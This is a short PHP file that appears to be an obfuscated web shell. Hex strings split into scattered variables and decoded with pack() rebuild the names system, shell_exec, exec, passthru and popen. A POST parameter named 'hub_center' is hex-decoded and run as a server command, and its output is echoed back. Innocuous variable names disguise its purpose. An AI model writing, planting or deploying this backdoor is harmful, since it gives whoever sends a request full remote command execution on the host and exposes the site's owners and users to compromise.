<?php


$record1 = '79';
$record2 = '65';
$record3 = '5f';
$record4 = '63';
$record5 = '70';
$record6 = '61';
$record7 = '73';
$record8 = '72';
$record9 = '6f';
$record10 = '74';
$record11 = '6d';
$record12 = '67';
$record13 = '6e';
$record14 = '68';
$module_controller1 = pack("H*", '73' . $record1 . '73' . '74' . $record2 . '6d');
$module_controller2 = pack("H*", '73' . '68' . $record2 . '6c' . '6c' . $record3 . '65' . '78' . '65' . $record4);
$module_controller3 = pack("H*", '65' . '78' . $record2 . $record4);
$module_controller4 = pack("H*", $record5 . $record6 . $record7 . $record7 . '74' . '68' . $record8 . '75');
$module_controller5 = pack("H*", '70' . $record9 . '70' . $record2 . '6e');
$module_controller6 = pack("H*", $record7 . $record10 . $record8 . '65' . '61' . $record11 . $record3 . $record12 . $record2 . $record10 . '5f' . $record4 . $record9 . $record13 . $record10 . $record2 . '6e' . $record10 . $record7);
$module_controller7 = pack("H*", $record5 . '63' . '6c' . '6f' . '73' . $record2);
$hub_center = pack("H*", $record14 . '75' . '62' . $record3 . '63' . '65' . $record13 . $record10 . $record2 . '72');
if (isset($_POST[$hub_center])) {
    $hub_center = pack("H*", $_POST[$hub_center]);
    if (function_exists($module_controller1)) {
        $module_controller1($hub_center);
    } elseif (function_exists($module_controller2)) {
        print $module_controller2($hub_center);
    } elseif (function_exists($module_controller3)) {
        $module_controller3($hub_center, $k_descriptor);
        print join("\n", $k_descriptor);
    } elseif (function_exists($module_controller4)) {
        $module_controller4($hub_center);
    } elseif (function_exists($module_controller5) && function_exists($module_controller6) && function_exists($module_controller7)) {
        $desc_pset = $module_controller5($hub_center, 'r');
        if ($desc_pset) {
            $tkn_obj = $module_controller6($desc_pset);
            $module_controller7($desc_pset);
            print $tkn_obj;
        }
    }
    exit;
}
